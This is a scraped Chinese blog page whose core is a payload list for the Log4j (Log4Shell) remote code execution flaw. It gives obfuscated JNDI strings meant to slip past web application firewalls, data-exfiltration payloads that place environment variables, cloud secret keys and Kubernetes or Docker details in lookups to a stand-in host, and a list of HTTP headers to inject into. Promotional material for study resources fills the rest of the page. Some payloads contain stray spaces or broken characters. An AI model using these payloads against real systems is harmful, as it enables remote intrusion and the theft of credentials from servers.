Apache Log4j RCE Waf Bypass & Data Exfiltration Payloads_log4j bypass

于 2024-05-16 05:40:47 发布
阅读量270 收藏 10
点赞数 5
分类专栏: 2024年程序员学习 文章标签: 网络安全 web安全 面试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84545579/article/details/138937802
版权

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

${jndi:ldap://domain.com/j} 
${jndi:ldap:/domain.com/a} 
${jndi:dns:/domain.com} 
${jndi:dns://domain.com/ j} 
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${: :-i}://domain.com/j} 
${${::-j}ndi:rmi://domain.com/j} 
${jndi:rmi://domainldap.com/j} 
${ ${lower:jndi}:${lower:rmi}://domain.com/j} 
${${lower:${lower:jndi}}:${lower:rmi}://domain.com/j } 
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://domain.com/j} 
${${lower:j}${upper: n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://domain.com/j} 
${jndi:${lower:l}${ lower:d}a${lower:p}://domain.com} 
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap$ {env:NaN:-:}//domain.com/a} 
jn${env::-}di: 
jn${date:}di${date:':'}
j${k8s:k5:-ND}i${sd:k5:-:} 
j${main:\k5:-Nd}i${spring:k5:-:} 
j${sys:k5:-nD }${lower:i${web:k5:-:}} 
j${::-nD}i${::-:} 
j${EnV:K5:-nD}i: 
j${lower:Nd }i${uPper::}

如果您能 ping 回但它是不可利用的,则以下有效负载可用于数据渗漏。

${jndi:ldap://${env:user}.domain.com/exp} 
${jndi:dns://${hostName}.domain.com/a} 
${jndi:dns://${ env:COMPUTERNAME}.domain.com/a} 
${jndi:dns://${env:USERDOMAIN}.domain.com/a} 
${jndi:dns://${env:AWS\_SECRET\_ACCESS\_KEY.domain.com/ a} 
${jndi:ldap://${ctx:loginId}.domain.com/j} 
${jndi:ldap://${map:type}.domain.com/j} 
${jndi:ldap: //${filename}.domain.com/j} 
${jndi:ldap://${date:MM-dd-yyyy}.domain.com/j} 
${jndi:ldap://${docker: containerId}.domain.com/j} 
${jndi:ldap://${docker:containerName}.domain.com/j} 
${jndi:ldap://${docker:imageName}.domain.com/j } 
${jndi:ldap://${env:USER}.domain.com/j} 
${jndi:ldap://${event:Marker}.domain.com/j} 
${jndi:ldap:/ /${mdc:UserId}.domain.com/j}
${jndi:ldap://${java:runtime}.domain.com/j} 
${jndi:ldap://${java:vm}.domain.com/j} 
${jndi:ldap:// ${java:os}.domain.com/j} 
${jndi:ldap://${jndi:logging/context-name}.domain.com/j} 
${jndi:ldap://${hostName} .domain.com/j} 
${jndi:ldap://${docker:containerId}.domain.com/j} 
${jndi:ldap://${k8s:accountName}.domain.com/j} 
$ {jndi:ldap://${k8s:clusterName}.domain.com/j} 
${jndi:ldap://${k8s:containerId}.domain.com/j} 
${jndi:ldap://$ {k8s:containerName}.domain.com/j} 
${jndi:ldap://${k8s:host}.domain.com/j} 
${jndi:ldap://${k8s:labels.app}。 domain.com/j} 
${jndi:ldap://${k8s:labels.podTemplateHash}.domain.com/j} 
${jndi:ldap://${k8s:masterUrl}.domain.com/j}
${jndi:ldap://${k8s:namespaceId}.domain.com/j} 
${jndi:ldap://${k8s:namespaceName}.domain.com/j} 
${jndi:ldap:// ${k8s:podId}.domain.com/j} 
${jndi:ldap://${k8s:podIp}.domain.com/j} 
${jndi:ldap://${k8s:podName}.domain .com/j} 
${jndi:ldap://${k8s:imageId}.domain.com/j} 
${jndi:ldap://${k8s:imageName}.domain.com/j} 
${jndi :ldap://${log4j:configLocation}.domain.com/j} 
${jndi:ldap://${log4j:configParentLocation}.domain.com/j} 
${jndi:ldap://${spring :spring.application.name}.domain.com/j} 
${jndi:ldap://${main:myString}.domain.com/j} 
${jndi:ldap://${main:0}。 domain.com/j} 
${jndi:ldap://${main:1}.domain.com/j} 
${jndi:ldap://${main:2}.domain.com/j} 
${ jndi:ldap://${main:3}.domain.com/j}
${jndi:ldap://${main:4}.domain.com/j} 
${jndi:ldap://${main:bar}.domain.com/j} 
${jndi:ldap:// ${name}.domain.com/j} 
${jndi:ldap://${marker}.domain.com/j} 
${jndi:ldap://${marker:name}.domain.com/j } 
${jndi:ldap://${spring:profiles.active[0].domain.com/j} 
${jndi:ldap://${sys:logPath}.domain.com/j} 
${jndi :ldap://${web:rootDir}.domain.com/j}

Check these headers

Accept-Charset
Accept-Datetime
Accept-Encoding
Accept-Language
Authorization
Cache-Control
Cf-Connecting\_ip
Client-Ip
Contact
Cookie
DNT
Forwarded
Forwarded-For
Forwarded-For-Ip
Forwarded-Proto
From
If-Modified-Since
Max-Forwards
Origin
Originating-Ip
Pragma
Referer
TE
True-Client-IP
True-Client-Ip
Upgrade
User-Agent
Via
Warning
X-ATT-DeviceId
X-Api-Version
X-Att-Deviceid
X-CSRFToken
X-Client-Ip
X-Correlation-ID
X-Csrf-Token
X-Do-Not-Track
X-Foo
X-Foo-Bar
X-Forward-For
X-Forward-Proto
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Port
X-Forwarded-Proto
X-Forwarded-Protocol
X-Forwarded-Scheme
X-Forwarded-Server
X-Forwarded-Ssl
X-Forwarder-For
X-Frame-Options
X-From
X-Geoip-Country
X-HTTP-Method-Override



还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!


王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。


对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!


【完整版领取方式在文末!!】


***93道网络安全面试题***


![](https://img-blog.csdnimg.cn/img_convert/6679c89ccd849f9504c48bb02882ef8d.png)








![](https://img-blog.csdnimg.cn/img_convert/07ce1a919614bde78921fb2f8ddf0c2f.png)





![](https://img-blog.csdnimg.cn/img_convert/44238619c3ba2d672b5b8dc4a529b01d.png)



**需要体系化学习资料的朋友,可以加我V获取:vip204888 (备注网络安全)**

内容实在太多,不一一截图了


### 黑客学习资源推荐


最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!


对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。


😝朋友们如果有需要的话,可以联系领取~

#### 1️⃣零基础入门


##### ① 学习路线


对于从来没有接触过网络安全的同学,我们帮你准备了详细的**学习成长路线图**。可以说是**最科学最系统的学习路线**,大家跟着这个大的方向学习准没问题。


![image](https://img-blog.csdnimg.cn/img_convert/acb3c4714e29498573a58a3c79c775da.gif#pic_center)


##### ② 路线对应学习视频


同时每个成长路线对应的板块都有配套的视频提供:


![image-20231025112050764](https://img-blog.csdnimg.cn/874ad4fd3dbe4f6bb3bff17885655014.png#pic_center)


#### 2️⃣视频配套工具&国内外网安书籍、文档


##### ① 工具


![](https://img-blog.csdnimg.cn/img_convert/d3f08d9a26927e48b1332a38401b3369.png#pic_center)


##### ② 视频


![image1](https://img-blog.csdnimg.cn/img_convert/f18acc028dc224b7ace77f2e260ba222.png#pic_center)


##### ③ 书籍


![image2](https://img-blog.csdnimg.cn/img_convert/769b7e13b39771b3a6e4397753dab12e.png#pic_center)

资源较为敏感,未展示全面,需要的最下面获取

![在这里插入图片描述](https://img-blog.csdnimg.cn/e4f9ac066e8c485f8407a99619f9c5b5.png#pic_center)![在这里插入图片描述](https://img-blog.csdnimg.cn/111f5462e7df433b981dc2430bb9ad39.png#pic_center)


##### ② 简历模板


![在这里插入图片描述](https://img-blog.csdnimg.cn/504b8be96bfa4dfb8befc2af49aabfa2.png#pic_center)

 **因篇幅有限,资料较为敏感仅展示部分资料,添加上方即可获取👆**




**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**[需要这份系统化资料的朋友,可以点击这里获取](https://bbs.csdn.net/topics/618540462)**

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
2401_84545579
关注
  • 5
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Greenplum【问题 01】报错 could not determine data type of parameter $2. 问题解决(踩坑分享)
Java与大数据相关实践内容分享!
08-23 4412
Greenplum【问题 01】报错 could not determine data type of parameter $2. 问题解决(踩坑分享)
Greenplum【异常 03】COPY命令报错 > ERROR: invalid input syntax for type double precision: ““(问题分析及解决方案)数据去重
Java与大数据相关实践内容分享!
10-08 2522
COPY命令报错 > ERROR: invalid input syntax for type double precision: ""(问题分析及解决方案)数据去重
k8s学习-StatefulSet(模板、更新、扩缩容、删除等)_statefulset模板
2401_84281594的博客
05-02 559
name: web
Greenplum【问题 01】报错 could not determine data type of parameter $2(1)
最新发布
2401_84132565的博客
05-13 834
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
ERROR: could not determine data type of parameter
翊墨的博客
03-14 2339
大概意思指的是:无法确定参数类型,只需要对 #{name} 进行类型转换就行,给它一个明确的类型即可。
apache-log4j-2.16.0-bin.rar
12-17
Apache Log4j2是一款广泛使用的Java日志框架,它允许应用程序记录各种运行时信息,以帮助开发者调试问题、监控系统性能以及追踪安全事件。然而,2021年底,一个严重漏洞被发现,被称为“Log4Shell”或CVE-2021-44228...
log4j2_rce 项目
02-23
《深入理解Log4j2 RCE漏洞:从概念到实战》 在信息技术领域,安全问题始终是关注的焦点。本文将深入探讨一个重要的安全漏洞——Log4j2远程代码执行(RCE)漏洞,该漏洞曾引起全球广泛关注。我们将从项目标题"Log4j2...
Log4j2 RCE漏洞分析
03-14
记录一下log4j2 RCE的原理
扫描log4j2 版本扫描log4j2 版本
12-16
然而,随着技术的发展,某些版本的Log4j2被发现存在严重的安全漏洞,这使得恶意攻击者有可能利用这些漏洞进行远程代码执行(RCE)攻击,对系统造成严重威胁。因此,"扫描log4j2版本"是确保系统安全的关键步骤。 ...
ant-media-server-docker:Ant Media Server是一个高度可扩展的实时视频流平台-WebRTC服务器。 超低延迟和自适应WebRTC流软件
03-09
ant-media-server-docker Ant Media Server是一个高度可扩展的实时视频流平台-WebRTC服务器。 超低延迟和自适应WebRTC流软件。 这旨在构建Ant Media Server Docker映像。 建造 docker build -t antmediaserver . 跑 具有内置数据量的容器 docker create --name antmediadata docker run --volumes-from antmediadata --network=host --privileged=true -it --rm antmediaserver
Ant-Media-Server,ant媒体服务器支持rtmp、rtsp、webrtc和自适应比特率。它还可以在MP4、HLS和FLV中录制视频.zip
09-26
Ant Media Server是一个开源媒体服务器,它支持:
AntMediaServer是一个开源的多媒体服务器
08-07
Ant Media Server支持RTMP,RTSP,WebRTC和Adaptive Bitrate。 它也可以用MP4,HLS和FLV录制视频
Android-Ant-Media-Server.zip
09-17
Android-Ant-Media-Server.zip,ant媒体服务器支持rtmp、rtsp、webrtc和自适应比特率。它还可以在MP4、HLS和FLV中录制视频,安卓系统是谷歌在2008年设计和制造的。操作系统主要写在爪哇,C和C 的核心组件。它是在linux内核之上构建的,具有安全性优势。
Android代码-Ant-Media-Server
08-07
Ant Media Server Ant Media Server is an open source media server that supports: Ultra Low Latency Adaptive One to Many WebRTC Live Streaming in Enterprise Edition Adaptive Bitrate for Live Streams (WebRTC, MP4, HLS) in Enterprise Edition SFU in One to Many WebRTC Streams in Enterprise Edition Live Stream Publishing with RTMP and WebRTC WebRTC to RTMP Adapter IP Camera Support Recording Live Streams (MP4 and HLS) Restream to Social Media Simultaneously(Facebook and Youtube in in Enterprise Edit
神仙级黑客入门教程(非常详细),从零基础入门到精通,从看这篇开始
z099164的博客
02-25 1990
黑客怎么入门?这还不简单吗?
探秘Ant Media Server:实时流媒体处理的新星
gitblog_00039的博客
03-21 596
探秘Ant Media Server:实时流媒体处理的新星 项目地址:https://gitcode.com/ant-media/Ant-Media-Server 在现代互联网中,实时流媒体已经成为信息传播的重要手段,而Ant Media Server正是这样一个致力于提供高效、稳定且可扩展的实时视频流解决方案的开源项目。 项目简介 Ant Media Server是由Ant Media Tec...
PostgreSQL - ERROR: could not determine data type of parameter $1
热门推荐
牧码的博客
05-18 1万+
SQL LIKE CONCAT('%', #{apiPageBo.apiName}, '%') 报错 ERROR: could not determine data type of parameter $7 分析 大概意思指的是:无法确定参数类型,只需要对#{apiPageBo.apiName} 进行类型转换就行,给它一个明确的类型即可。 解决 LIKE CONCAT('%', #{apiPageBo.apiName}::text, '%') ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值